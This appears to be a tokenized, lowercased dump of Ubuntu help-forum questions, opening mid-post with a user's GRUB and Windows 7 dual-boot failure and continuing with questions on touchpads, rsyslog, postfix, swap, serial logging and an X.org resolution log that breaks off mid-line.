loud , like never heard *find -- set-root /boot/ vmlinuz-3.2.0-53-generic-pae* soon after it stops to be loud *error 15 : file not found grub > grub > root ( hd0,4 ) fatal ! inconsistent data read from ( 0x80 ) 314311665+127 fatal ! inconsistent data read from ( 0x80 ) 314311725+1 error25 : disk read error grub > find /vmlinuz-3.2.0-53-generic-pae ( hd0,3 ) fatal ! inconsistent data read from ( 0x80 ) 314311665+127 fatal ! inconsistent data read from ( 0x80 ) 314311725+1 grub > * if i want to look in ( hd0,4 ) does not success , if i search vmlinuz-3.2.0-53-generic-pae , is fond in extended partition . lets take a look where is ( 0x80 ) 314311665+127 and ( 0x80 ) 314311725+1 : i think this is from easy bcd with no neo grub , numbers are same , but with neo grub strange things hapen with hdd . neogrub goes worst . start… initialize variabile space… starting cmain ( ) … fatal ! inconsistent data read from ( 0x80 ) 314311665+127 ( =314311792 ) fatal ! inconsistent data read from ( 0x80 ) 314311725+1 device boot start end blocks id system /dev/sda1 * 2056320 2265164 104422+ 7 hpfs/ntfs/exfat /dev/sda2 2265165 312271469 155003152+ 7 hpfs/ntfs/exfat /dev/sda3 314311725 488396799 87042537+ 5 extended /dev/sda4 63 2056319 1028128+ 83 linux separate boot /dev/sda5 314311788 486432134 86060173+ 83 linux /dev/sda6 486432768 488396799 982016 82 linux swap / solaris warning ! : 314311725 is begining of extended partition 314311665 is before extended +127 goes inside sda5 witch is logical partition then 314311665 is sopmewhere before data starts on extended partition3 . +127 ( =314311792 ) is somewherw inside sda5 , 314311725 is begining of extended partition remember , i had w7 first than ubuntu auto instalation resulted in case like xxxpaste.ubuntu.com/6105957 358 xxxpaste.ubuntu.com/6121500 dos and linux will interpret the contents differently . so if i fix grub and start win i have two errors error : no device connected error : no device connected and if i fix mbr , than from easybcd start ubuntu i have two erros too : fatal ! inconsistent data read from ( 0x80 ) 314311665+127 ( =314311792 ) fatal ! inconsistent data read from ( 0x80 ) 314311725+1 maybee it is matter of the same thing , cause of sumilar behavior . new partitions i had shrink w7 on first 50g and put ubuntu inside second 50g , so both os are inside first 100g of the disk . and i take care to align ewery thing with cylinders . new partition is : partition file sistem label size used unused flags unalocated unalocated 201m /dev/sda1 ntfs systreser . 99m 24,45m 74,55 boot /dev/sda2 ntfs 43,95g 14,92 29,03 unalocated unalocated 502,51m /dev/sda3 extended 44,93g /dev/sda5 ext4 grub 996,19m /dev/sda6 – hd ( 0,5 ) ext4 root 9.77g /dev/sda7 ext4 swap 4,89g /dev/sda8 ext4 home 28,81g unalocated unalocated 502,03m unalocated unalocated 38,07g /dev/sda4 ntfs data 100,27g unalocated unalocated 4,88g new ubuntu instalation inside prepared , aligned partitions . during instalation i dont know where to mount grub partition sda5 . so i excluded it . also instalation had was not happy to put grub in it . device /dev/sda5 , for instalation of boot loader have no mount point . instal ubuntu xxxpaste.ubuntu.com/6117370 in row near 600 again : warning : extended partition does not start at a cylinder boundary . dos and linux will interpret the contents differently . maybe my mistake . after partition i had no os and grub , so i neither try to generate report . start ubuntu from easy bcd : easy bcd autodetect fatal ! inconsistent data read from ( 0x80 ) 294154098+127 ( = ) fatal ! inconsistent data read from ( 0x80 ) 294154210+8 booting /boot/grub/menu.lst fatal ! inconsistent data read from ( 0x80 ) 294154098+127 ( = ) fatal ! inconsistent data read from ( 0x80 ) 294154210+8 booting /boot/grub.conf fatal ! inconsistent data read from ( 0x80 ) 294154098+127 ( = ) fatal ! inconsistent data read from ( 0x80 ) 294154210+8 booting /grub.conf fatal ! inconsistent data read from ( 0x80 ) 294154098+127 ( = ) fatal ! inconsistent data read from ( 0x80 ) 294154210+8 booting /boot/grub.conf boot-repair default xxxpaste.ubuntu.com/6117634 does not start gparted - align extended partition with cylinders after alignment xxxpaste.ubuntu.com/6119317 no warnig about alignment gparted again : xxxpaste.ubuntu.com/6119402 partition file sistem label size used unused flags unalocated unalocated 201m /dev/sda1 ntfs systreser . 99m 24,45m 74,55 boot /dev/sda2 ntfs 43,95g 14,92 29,03 unalocated unalocated 502,51m /dev/sda3 extended 45,02g /dev/sda5 ext4 root 10,74g /dev/sda6 – hd ( 0,5 ) linux-swap swap 5,37g /dev/sda7 ext4 home 28,32g unalocated unalocated 604,01m unalocated unalocated 37,98g /dev/sda4 ntfs data 100,27g unalocated unalocated 4,88g grub was in separated 1g partition witch was not mounted , i did not experimented a lot , it does not work because now i hawe both os inside first 100g , i deleted it . boot-repair restore mbr : xxxpaste.ubuntu.com/6119447 instal ubuntu xxxpaste.ubuntu.com/6121500 ok i hve fresh instaled ubuntu with no warning : extended partition does not start at a cylinder boundary . start… error no such partition grub rescue > ls ( hd0 ) ( hd0 , msdos4 ) ( hd0 , msdos2 ) ( hd0 , msdos2 ) ( fd0 ) ls ( hd0 , msdosx ) / answer is unknown file system for all uper options no vmliuz or initrd found . unable to make root= ( hd0 , msdosx ) unable to make configfile /boot/grub/grub.cfg move boot flag partition file sistem label size used unused flags unalocated unalocated 201m /dev/sda1 ntfs systreser . 99m 24,45m 74,55 /dev/sda2 ntfs 43,95g 14,92 29,03 unalocated unalocated 502,51m /dev/sda3 extended 45,02g boot /dev/sda5 ext4 root 10,74g /dev/sda6 – hd ( 0,5 ) linux-swap swap 5,37g /dev/sda7 ext4 home 28,32g unalocated unalocated 604,01m unalocated unalocated 37,98g /dev/sda4 ntfs data 100,27g unalocated unalocated 4,88g error no such partition grub rescue > ls ( hd0 ) ( hd0 , msdos4 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) ( fd0 ) from http : //paste.ubuntu.com/6121500 : recommended-repair this setting would reinstall the grub2 of sda5 into the mbrs of all disks partitions & disks : 477 sda1 w7syres no-update-grub , 32 no-boot , is-os , not -- efi -- part , 478 sda2 w7 no-update-grub , 32 no-boot , is-os , not -- efi -- part , 479 sda5 root update-grub , 32 with-bootis-os , not -- efi -- part , 480 sda7 home no-update-grub , 32 no-boot , no-os , not -- efi -- part , 481 sda4 ntfsdata no-update-grub , 32 no-boot , no-os , not -- efi -- part , 477 sda1 w7syres part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , 478 sda2 w7 part-has-no-fstab , part-has-no-fstab , no-nt , haswinload , no-recov-nor-hid , 479 sda5 root fstab-without-boot , fstab-without-efi , no-nt , no-winload , no-recov-nor-hid , 480 sda7 home part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , 481 sda4 ntfsdata part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , 477 sda1 w7syres bootmgr , is-winboot , nopakmgr , nogrubinstall , no -- -usr , 478 sda2 w7 bootmgr , is-winboot , nopakmgr , nogrubinstall , no -- -usr , 479 sda5 root no-bmgr , notwinboot , apt-get , grub-install , with -- usr , 480 sda7 home no-bmgr , notwinboot , nopakmgr , nogrubinstall , no -- -usr , 481 sda4 ntfsdata no-bmgr , notwinboot , nopakmgr , nogrubinstall , no -- -usr , 477 sda1 w7syres part-has-no-fstab , not-sep-usr , standard , not-far , /mnt/boot-sav/sda1 . 478 sda2 w7 part-has-no-fstab , not-sep-usr , standard , not-far , /mnt/boot-sav/sda2 . 479 sda5 root fstab-without-usr , not-sep-usr , standard , not-far , /mnt/boot-sav/sda5 . 480 sda7 home part-has-no-fstab , not-sep-usr , standard , not-far , /mnt/boot-sav/sda7 . 481 sda4 ntfsdata part-has-no-fstab , not-sep-usr , standard , farbios , /mnt/boot-sav/sda4- 346 unknown bootloader on sda3 -- - = extended partition table red lines 355 – 00000070 to 366 – 00000120 395 =================== os-prober : 396 /dev/sda1 : windows 7 ( loader ) : windows : chain 397 /dev/sda2 : windows 7 ( loader ) : windows1 : chain 398 /dev/sda5 : ubuntu 12.04 lts ( 12.04 ) : ubuntu : linux 333 sda5 : location of files loaded by grub : 243 set root= ' ( hd0 , msdos5 ) -- - -- - grub rescue > ls ne vidi ( hd0 , msdos5 ) 130 sda5/boot/grub/grub.cfg : 23 boot file info : grub2 ( v1.97-1.98 ) in the file /nst/nst_linux-16fcf801c94ff0d2ca4d0503bf440b11.mbr looks at sector 97021229 of the same hard drive for core.img , but core.img can not be found at this location . -- - -- -this is from easybcd 3 = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos5 ) /boot/grub on this drive . grub rescue tega ( , msdos5 ) ne vidi : 84 partition boot start sector end sector # of sectors id system /dev/sda1 * 411,648 614,399 202,752 7 ntfs / exfat / hpfs /dev/sda2 614,400 92,774,399 92,160,000 7 ntfs / exfat / hpfs /dev/sda3 93,803,535 188,217,539 94,414,005 5 extended /dev/sda5 93,803,598 116,326,664 22,523,067 83 linux /dev/sda6 116,326,728 127,588,229 11,261,502 82 linux swap / solaris /dev/sda7 127,588,293 186,980,534 59,392,242 83 linux /dev/sda4 267,867,810 478,158,659 210,290,850 7 ntfs / exfat / hpfs after updating ubuntu have new grub boot-repair + out of disk + repair data systems http : //paste.ubuntu.com/6124520 nothing is changed i stil have bsituation 1 or situation 2 grub rescue > ls ( hd0 ) ( hd0 , msdos4 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) ( fd0 ) any solution to this problem ? thanks . chkdsk was done automatically , after mowing and shrinking win , they have had to bee booted from instalation cd . now i had done chkdsk /f /r and repair/install grub with no change . paste.ubuntu.com/6129754 - no warnings i would direct yr attention at lines 426 – 462 : unknown mbrs/boot sectors/etc : unknown bootloader on sda3 . why is this thing there inside extended partition ? why it is unknown ? were grub looks immediately after start , to generate two messages error : no device connected , then , after doing other jobs , after some time , displays menu with boot options ? are two error messages , two w7 partitions ? what is the connection between failed win start and two error messages ? what is the connection between error message and tables in lines 659-762 inside bootinfo , that represent three ntfs partitions ? first says : a disk read error occurred boot managr is compressed ctrl-adlt-del to restat . second and third says a disk read error occurred boot managr is missing boot managr is compressed ctrl-adlt-del to restat . so , the first table is a small win7 boot partition that contains boot mngr but like text says incomprehensible compressed . other two are two ntfs partitions containing win7 files and data respectively . why boot info says that win boot info in sda is ( to the grub ? ) incomprehensible compressed ? line 560 says : sda1 has win boot and no winload , and sda2 has win boot and winload , both have bootmngr , other partitions are without btmgr . sda5 has boot on other place in the table , in respect to sda1 & 2 and strange thing is fstab without boot . when i could not access ubuntu from win the message is : fatal ! inconsistent data read from ( 0x80 ) 314311665+127 ( =314311792 ) *fatal ! inconsistent data read from ( 0x80 ) 314311725+1* 314311665 is before extended , and +127 goes inside sda5 witch is logical partition 314311725 is begining of extended partition can this overlapping give some explanation about my problem ? can give some explaination fact , that i have two error messages at the very begin of the start , no mater if i go from side of grub or from side of easybcd ? on the other theme : machine is notebook containing fd , it is not a desktop . omg ! is because i tried many more or less simple solutions from forums , with no success and i wished to be explanatory . im not able to coin solution by myself . can give just description and my intuitive suspection is formulated in many upper questions . what im asking is some purpose , like look here and there , execute this and that and tel me what you get , so we can make diagnose and location of the trouble , knowing what and where it is , we can start to built the solution . i think it can be found inside boot info , just someone more skilled than me , must to look in it . problem looks like that grub inside mbr of sda disorientate winboot and-or winload from one side , and from other side wnboot and-or winload inside mbr of sda disorientate grub , on the way that disorientated one is unable to find his path to the proper ( boot ) partition . even more , he is sure , from the fist moment of start , that his boot target is non-existent , or maybe corrupted , or incomprehensible compressed . thing that normaly should not happens . bye
347309	is it possible to control minimum finger distance to trigger touchpad events ?	i 'm using touchegg and synaptics , and i 'm trying to configure synaptics 3-finger gesture sensitivity . currently , 3-finger dragging is being triggered by accident , and i think if i could configure a minimum finger distance for triggering events it would solve the matter . i say this because i 've realized that 3-finger gestures are being triggered no matter how appart the touch points are . i 've already enabled palmdetect , and tweaked a bit , which helped a lot avoiding random 2-finger scrolling , but did n't help for 3-finger . edit at the moment , as a way out , i had changed my 3-finger gestures to 4-finger ones so it gets harder to generate random effects .
347310	centralized rsyslog with visualization	1 > what are my options ( open source ) for a centralized rsyslog solution that it comes ( or can be added ) with visualization over my logs coming from remote rsyslog nodes ? 2 > what are the security considerations to use use rsyslog to forward logs over internet to my log collection sever ?
347312	can vnc screen definitions be added at start up ?	i have an aws ubuntu 12.04 gui instance . i access it from my home windows pc using vnc . since the instance is stopped when not in use , every time i start it i have to ssh terminal into it to run the vnc screen definitions commands . only then i can start my vnc viewer into the gui . is there a way to include the vnc screen definitions in a batch or startup script , so that they are created automatically every time i start the machine ?
347313	unable to mount linux partition with live cd	my ubuntu is working fine until i power off directly when ubuntu does not boot , after selecting ubuntu option to go to ubuntu , it simply displaying small cursor at the top left hand side and got stuck , so i start of restarting after long time when i am not able to restart with restart button on my cpu i power off directly and when i start cpu again when i try to enter in to ubuntu again it prompts initramfs , i face these type of problems before also but solved with few commands given in some links when i am try to follow the same procedure i am not able to mount my ubuntu partition it self it does nothing for few minutes say around 30-40mins and then it prompts with the below message dbus error org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . can any one please suggest with this thanks arjun
347315	ubuntu mobile for new droid maxx	recently my old feature phone broke down so i 'm considering getting a new smartphone that supports ubuntu . i 've been looking into the new verizon droid maxx ( completely different from the razr maxx ) and was wondering if it 's compatible with the current version of ubuntu touch . has anyone tested it out , and if not , what are the requirements for install ? also , what is the current state of ubuntu for phones / ubuntu touch ? thanks for any feedback !
347320	how can i backup my pre-installed windows 8 before i install ubuntu ?	i 'm really new to ubuntu , and i want to install it ( ubuntu 13.04 ) alongside my windows 8 pre-installed laptop ( toshiba l850/046 ) . i wan na be able to pick between the two at startup , because as much as people hate it , i personally like windows 8 . i 've done a lot of looking around and many people seem to have problems with installing on windows 8 . so i was wondering how i can backup my windows 8 software , and if something went wrong ( for example my windows 8/hard drive got wiped out ) , how would i be able to re-install windows 8 from the back up ? ( sorry if this sounds noobish , not that good with computers : / ) p.s . i plan on installing it with a dvd , that means i do n't have to make new partition spaces and can just click the `` install alongside windows 8 '' option right ?
347323	costumization of desktop panal bars	i have ubuntu 12.04 lts installed . i did some un-installing to get rid of unity and now i use a gnome classic theme . it has been a couple of years since i last used ubuntu but i remember that it use to have allot more customizations to it . the question i have is this ; is there a way to customize the panels at the top and bottom of the desktop ? i have figured out how to add program launchers just by dragging and dropping , but i can not make the panels larger or customize them at all . any suggestions or advise would be greatly appreciated ...
347324	postfix doesnt send to all domains	i have postfix setup to send only . it sends to many domains successfully but fails to be received by the domain listed when setting up postfix . why does n't the mail get delivered ? main.cf : myhostname = test alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases myorigin = /etc/mailname mydestination = smtp.example.com , mydomain.com , test , localhost.localdomain , localhost relayhost = mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 mailbox_size_limit = 0 recipient_delimiter = inet_interfaces = all inet_protocols = all logs : sep 18 22:55:01 web2 postfix/pickup [ 5229 ] : ad184bf1cf : uid=1001 from= < ted > sep 18 22:55:01 web2 postfix/cleanup [ 5246 ] : ad184bf1cf : message-id= < 20130919025501.ad184bf1cf @ web2 > sep 18 22:55:01 web2 postfix/qmgr [ 5230 ] : ad184bf1cf : from= < ted @ mydomain.com > , size=503 , nrcpt=1 ( queue active ) sep 18 22:55:01 web2 postfix/local [ 5248 ] : ad184bf1cf : to= < ted @ mydomain.com > , orig_to= < ted > , relay=local , delay=0.03 , delays=0.02/0/0/0.01 , dsn=2.0.0 , status=sent ( delivered to $ sep 18 22:55:01 web2 postfix/qmgr [ 5230 ] : ad184bf1cf : removed
347325	does ubuntu 13.04 support touchscreen input in any way ?	i have a fujitsu lifebook t732 tablet convertible notebook pc , and i 'd like to be able to use the touchscreen on ubuntu . is there any application written to adapt ubuntu to my touchscreen hardware ?
347330	how to prevent from suspending when lid is closed at the login screen ?	when logged in , i was able to go into the settings and change `` when the lid is closed '' to `` do nothing '' , and it works accordingly . i want to be able to ssh into the laptop without first logging in at the laptop . when i 'm at the login screen of the laptop and i close the lid , the laptop still suspends and i can not ssh into it . how can i disable suspend when the lid closes while i 'm at the login screen ?
347332	is ubuntu swap enabled	i have installed ubuntu in my computer , later , i format a partition as linux swap and want to replace it with existing tmp directory under mount point / . i followed procedure given in this link : http : //ubuntuforums.org/showthread.php ? t=1670222 . the question is that the swap is still not enabled . here is some command output . shijiex @ shijie-thinkpad-t410 : ~ $ df filesystem 1k-blocks used available use % mounted on /dev/sda1 28703740 5324096 21914916 20 % / tmpfs 1180916 924 1179992 1 % /run ... ... ... /dev/sda7 28706812 17150036 10091896 63 % /home shijiex @ shijie-thinkpad-t410 : ~ $ sudo blkid -c /dev/null -o list device fs_type label mount point uuid -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - /dev/sda1 ext4 / 47d9205b-00a8-40e5-88d6-e8b9571799a7 ... /dev/sda7 ext4 /home e2ae897d-62b1-45d3-a17a-49e7a1b8fbe7 /dev/sda9 swap < swap > 81ce2033-4ff2-4e05-9500-aacfd1019855 shijiex @ shijie-thinkpad-t410 : ~ $ sudo mount /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) ... ... /dev/sda8 on /opt type ext4 ( rw ) /dev/sda5 on /backup type ext4 ( rw ) /dev/sda6 on /other type ext4 ( rw ) /dev/sda7 on /home type ext4 ( rw ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/shijiex/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=shijiex ) at the end of /etc/fstab , it is : # swap was on /dev/sda9 during installation uuid=81ce2033-4ff2-4e05-9500-aacfd1019855 none swap sw 0 0 shijiex @ shijie-thinkpad-t410 : ~ $ df filesystem 1k-blocks used available use % mounted on /dev/sda1 28703740 5324100 21914912 20 % / udev 2942940 4 2942936 1 % /dev tmpfs 1180916 924 1179992 1 % /run none 5120 0 5120 0 % /run/lock none 2952280 156 2952124 1 % /run/shm /dev/sda8 14286320 11978284 1575672 89 % /opt /dev/sda5 38317716 36097448 267144 100 % /backup /dev/sda6 85532500 35151740 46029084 44 % /other /dev/sda7 28706812 17150392 10091540 63 % /home the swap partition is sda9.i am not sure whether swap is enabled , because : /dev/sda9 is not in list of df result . while previously it always should be like : /dev/sda9 28706812 17150392 10091540 63 % /tmp gpart shows that /dev/sda9 as linux-swap with 14.85g , used unused -- -- i was unable to access swap area . previously , swap was always mount as /tmp and i can access this directory . now the /tmp is only a directory under /.. the os is ubuntu 12.04 lts.. [ update ] : the swap should have been enabled , cat /proc/swaps : /dev/sda9 partition 15575036 0 -1 though the used size is 0 . now the scenario is : i already have tmp directory under / , how can i mount swap this partition as mount point is /tmp . i modified last line of fstab as : uuid=81ce2033-4ff2-4e05-9500-aacfd1019855 /tmp swap sw 0 0 then mount -a and reboot does not report any error . but used in swap is 0 though i dumped many file content to /tmp . so how can i fully utilized swap area , which is almost 15g ? it is waste of disk if it always 0 used.. or how can i just change /tmp to the swap partition ? i want this because this directory is widely used in my program and it is also as exchange area between my ubuntu and hosted windowxp . both requires large disk space..
347333	suppress icmp redirect return on ping	i have a network that pinging from windows shows a standard reply . when pinging from ubuntu a 64big host redirect is returned . the network is designed with a dhcp helper in the router which i can not control which may be the cause . i am using nagios on ubuntu to do a check ping and would like to know if there is a way to suppress any redirect messages and just show the pings bytes , time and ttl . i do n't care if the packet is redirected . if there is a ping option or an option within the os configuration to suppress all redirect messages that would work .
347335	error while repairing bootloader via boot-repair	i have installed elementary os on my laptop , than i installed windows 8.1 rtm on another partition.but it messed up something.i cant boot eos now..i can boot only to windows automatically.as i searched here , i tried repairing via boot-repair.but it gives error every time . i am noob to linux . so can someone please look at the error log boot-repair gave ? error log
347340	how to dump raw serial data to disk	how can i record all data coming out of a serial port straight to a file on disk ? i have tried cat and cp , but these appear to be buffered , and i am trying to log a small amount of data , so nothing comes through .
347342	i can not connect to the internet	i have installed ubuntu on two different computers . in both cases it tells me it needs to download the drivers for the network card , but can not conect to the internet .
347343	ca n't set proper resolution : ubuntu w/openbox vs raspbian	i have both a beaglebone black and a raspberry pi that i 'm working with , and figured this would be the best place to ask , since the bbb has ubuntu with openbox only and raspbian is debian based ... i 'm using a motorola bionic lapdock to connect to either device as it 's easier in my opinion then having to have a separate full blown monitor , keyboard and mouse hooked up . first the rpi : with no crazy configuring of any kind , when i hook up the rpi to the dock , it recognizes the dock 's 1366 x 768 resolution and both the cli and the lxde gui run on the correct resolution . -however- for the bbb : when hooked up , it does n't recognize the monitor the same way and both the cli and openbox gui are stuck in a 700x568 ( i might be slightly off with that number ) resolution . i 've read up on editing the xorg.conf and different functions that the `` xrandr '' command is capable of . when i try xrandr -q i get a response about it not being able to detect something with the gamma output and then what the min , current , and max resolutions are . i know the lapdock is capable of the 1366x768 but it says the max is 700x568 ... my /etc/x11 folder does not have an xorg.conf file generated and i did n't want to just go start trying to make one and mess things up . so , my question ( s ) would be : what would be the best route for me to take to force the correct resolution ? for the cli i 'm not sure if resolution has anything to do with it , but i would like the text to be smaller as it would be in a higher resolution environment . and as for the openbox gui i 'd like it to be set to the display 's capable 1366x768 . update : i 've tried to run : sudo xorg -configure and it fails telling me that no displays were detected . i also thought maybe i 'd check the xorg.conf file on my raspberry pi 's raspbian distro ( seeing as how the resolution and stuff is detected fine on there ) , but sadly that x11 folder does n't have an xorg.conf file ; however , it does seem to have other files relating to the x server that are n't on my ubuntu distro . also , i tried issuing the command : xrandr -q on my raspberry pi , but it reports that it `` ca n't open display '' . so , my conclusion at this point is that i can force the resolution and/or font of the cli and the gui without the os recognizing exactly what the display is , but i do n't understand what i can maybe copy over or look for on the raspbian distro that 's causing it to work properly where the ubuntu distro is n't . thanks for any help . as an updated additional question , i 'd wonder if there 's a driver i may need that i do n't have ? are there any other generic drivers that might not come stock that i could download for this ? i do n't know of any proprietary drivers the motorola bionic lapdock would require , so if anyone might have any ideas on what to check or download in regards to drivers that could help too . again here 's another addition : i ran the following command that was recommended on another forum to check the edid information and output when an x session is initiated . x -verbose 6 > ~/xlog.txt 2 > & 1 i was hoping maybe someone experienced in this could read the following output and see if they can figure out what i need to do . x.org x server 1.11.3 release date : 2011-12-16 x protocol version 11 , revision 0 build operating system : linux 2.6.42-1426-omap4 armv7l ubuntu current operating system : linux bbb 3.8.13-bone20 # 1 smp wed may 29 10:49:26 utc 2013 armv7l kernel command line : console=ttyo0,115200n8 fixrtc root=/dev/mmcblk0p2 ro rootfstype=ext4 rootwait fixrtc build date : 11 april 2013 01:10:51pm xorg-server 2:1.11.4-0ubuntu10.13 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.24.4 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : fri sep 27 18:37:40 2013 ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' ( == ) no layout section . using the first screen section . ( == ) no screen section available . using defaults . ( ** ) | -- > screen `` default screen section '' ( 0 ) ( ** ) | | -- > monitor `` < default monitor > '' ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . ( == ) automatically adding devices ( == ) automatically enabling devices ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . entry deleted from font path . ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . entry deleted from font path . ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . entry deleted from font path . ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . entry deleted from font path . ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . entry deleted from font path . ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . entry deleted from font path . ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins ( == ) modulepath set to `` /usr/lib/arm-linux-gnueabihf/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . ( ii ) loader magic : 0xb6fa8d00 ( ii ) module abi versions : x.org ansi c emulation : 0.4 x.org video driver : 11.0 x.org xinput driver : 16.0 x.org server extension : 6.0 ( ii ) loadmodule : `` extmod '' ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so ( ii ) module extmod : vendor= '' x.org foundation '' compiled for 1.11.3 , module version = 1.0.0 module class : x.org server extension abi class : x.org server extension , version 6.0 ( ii ) loading extension mit-screen-saver ( ii ) loading extension xfree86-vidmodeextension ( ii ) loading extension xfree86-dga ( ii ) loading extension dpms ( ii ) loading extension xvideo ( ii ) loading extension xvideo-motioncompensation ( ii ) loading extension x-resource ( ii ) loadmodule : `` dbe '' ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so ( ii ) module dbe : vendor= '' x.org foundation '' compiled for 1.11.3 , module version = 1.0.0 module class : x.org server extension abi class : x.org server extension , version 6.0 ( ii ) loading extension double-buffer ( ii ) loadmodule : `` glx '' ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so ( ii ) module glx : vendor= '' x.org foundation '' compiled for 1.11.3 , module version = 1.0.0 abi class : x.org server extension , version 6.0 ( == ) aiglx enabled ( ii ) loading extension glx ( ii ) loadmodule : `` record '' ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so ( ii ) module record : vendor= '' x.org foundation '' compiled for 1.11.3 , module version = 1.13.0 module class : x.org server extension abi class : x.org server extension , version 6.0 ( ii ) loading extension record ( ii ) loadmodule : `` dri '' ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so ( ii ) module dri : vendor= '' x.org foundation '' compiled for 1.11.3 , module version = 1.0.0 abi class : x.org server extension , version 6.0 ( ii ) loading extension xfree86-dri ( ii ) loadmodule : `` dri2 '' ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so ( ii ) module dri2 : vendor= '' x.org foundation '' compiled for 1.11.3 , module version = 1.2.0 abi class : x.org server extension , version 6.0 ( ii ) loading extension dri2 ( == ) matched pvr as autoconfigured driver 0 ( == ) matched fbdev as autoconfigured driver 1 ( == ) assigned the driver to the xf86configlayout ( ii ) loadmodule : `` pvr '' ( ww ) warning , could n't open module pvr ( ii ) unloadmodule : `` pvr '' ( ii ) unloading pvr ( ee ) failed to load module `` pvr '' ( module does not exist , 0 ) ( ii ) loadmodule : `` fbdev '' ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so ( ii ) module fbdev : vendor= '' x.org foundation '' compiled for 1.11.3 , module version = 0.4.2 abi class : x.org video driver , version 11.0 ( == ) matched pvr as autoconfigured driver 0 ( == ) matched fbdev as autoconfigured driver 1 ( == ) assigned the driver to the xf86configlayout ( ii ) loadmodule : `` pvr '' ( ww ) warning , could n't open module pvr ( ii ) unloadmodule : `` pvr '' ( ii ) unloading pvr ( ee ) failed to load module `` pvr '' ( module does not exist , 0 ) ( ii ) loadmodule : `` fbdev '' ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so ( ii ) module fbdev : vendor= '' x.org foundation '' compiled for 1.11.3 , module version = 0.4.2 abi class : x.org video driver , version 11.0 ( ii ) unloadmodule : `` fbdev '' ( ii ) unloading fbdev ( ii ) failed to load module `` fbdev '' ( already loaded , 0 ) ( ii ) fbdev : driver for framebuffer : fbdev ( -- ) using vt number 8 ( ww ) falling back to old probe method for fbdev ( ii ) loading sub module `` fbdevhw '' ( ii ) loadmodule : `` fbdevhw '' ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so ( ii ) module fbdevhw : vendor= '' x.org foundation '' compiled for 1.11.3 , module version = 0.0.2 abi class : x.org video driver , version 11.0 ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so ( ii ) fbdev ( 0 ) : using default device ( ww ) vga arbiter : can not open kernel arbiter , no multi-card support ( ii ) fbdev ( 0 ) : creating default display subsection in screen section '' default screen section '' for depth/fbbpp 16/16 ( == ) fbdev ( 0 ) : depth 16 , ( == ) framebuffer bpp 16 ( == ) fbdev ( 0 ) : rgb weight 565 ( == ) fbdev ( 0 ) : default visual is truecolor ( == ) fbdev ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) ( ii ) fbdev ( 0 ) : hardware : ( video memory : 810kb ) ( ii ) fbdev ( 0 ) : checking modes against framebuffer device ... ( ii ) fbdev ( 0 ) : checking modes against monitor ... ( -- ) fbdev ( 0 ) : virtual size is 720x576 ( pitch 720 ) ( ** ) fbdev ( 0 ) : built-in mode `` current '' ( == ) fbdev ( 0 ) : dpi set to ( 96 , 96 ) ( ii ) loading sub module `` fb '' ( ii ) loadmodule : `` fb '' ( ii ) loading /usr/lib/xorg/modules/libfb.so ( ii ) module fb : vendor= '' x.org foundation '' compiled for 1.11.3 , module version = 1.0.0 abi class : x.org ansi c emulation , version 0.4 ( ** ) fbdev ( 0 ) : using shadow framebuffer ( ii ) loading sub module `` shadow '' ( ii ) loadmodule : `` shadow '' ( ii ) loading /usr/lib/xorg/modules/libshadow.so ( ii ) module shadow : vendor= '' x.org foundation '' compiled for 1.11.3 , module version = 1.1.0 abi class : x.org ansi c emulation , version 0.4 ( == ) fbdev ( 0 ) : backing store disabled ( ee ) fbdev ( 0 ) : fbioputcmap : invalid argument ( ee ) fbdev ( 0 ) : 